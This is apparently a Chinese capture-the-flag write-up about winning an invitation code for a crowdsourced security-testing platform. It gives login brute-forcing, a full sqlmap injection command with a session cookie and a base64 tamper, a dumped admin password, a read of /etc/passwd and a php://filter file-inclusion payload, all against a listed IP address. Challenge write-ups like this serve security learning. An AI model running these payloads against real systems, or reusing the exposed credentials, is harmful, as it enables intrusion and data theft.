众安天下众测平台邀请码获取
之前获得邀请码做的一个小游戏,简单记录一下。
小游戏获取
通过注册页面,如何获取获取邀请码,找到游戏入口。
目录遍历
http://119.3.191.245:8877/info.php
http://119.3.191.245:8877/Login.php
使用匹配返回包内容进行爆破
爆破用户名
admin
test
爆破密码
test/test123
然后登陆test 发现aid可以遍历,尝试sql注入无果
继续翻发现有个下一节,多了个参数,继续爆破,注意参数为base64加密需要使用脚本,还有必须携带cookie。
sqlmap -u "http://119.3.191.245:8877/user/Article.php?aid=3&id=*" --cookie="PHPSESSID=pjc2ls8eqt98aj3ej7mims6797" --batch --random-agent --tamper base64encode.py -D "level2" -T "user" --dump
注入找到admin账号密码
admin/A2f8jwhe!f
登陆admin账号,有个提示,发现是任意文件读取
读取/etc/passwd,寻找flag无果
使用文件包含读取源代码
http://119.3.191.245:8877/user/Read.php?filename=php://filter/read=convert.base64-encode/resource=Read.php
一步一步操作
看到源代码直接使用meifahufujiulaimingdu.php发送邮件,获取flag。